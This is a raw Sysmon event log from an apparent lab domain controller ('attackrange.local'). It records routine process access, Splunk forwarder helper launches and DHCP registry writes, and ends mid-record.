14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.198{59A5CD1D-9544-6005-5A05-00000000A301}38047080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.042{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:57.134{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000018689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1600-00000000A301}15444444C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1600-00000000A301}15444444C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000018686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000018685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x800000000000000018684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x6005a35e) 13241300x800000000000000018683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x6005a19c) 13241300x800000000000000018682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60059c56) 13241300x800000000000000018681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x6005954e) 13241300x800000000000000018680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x800000000000000018679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x800000000000000018678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 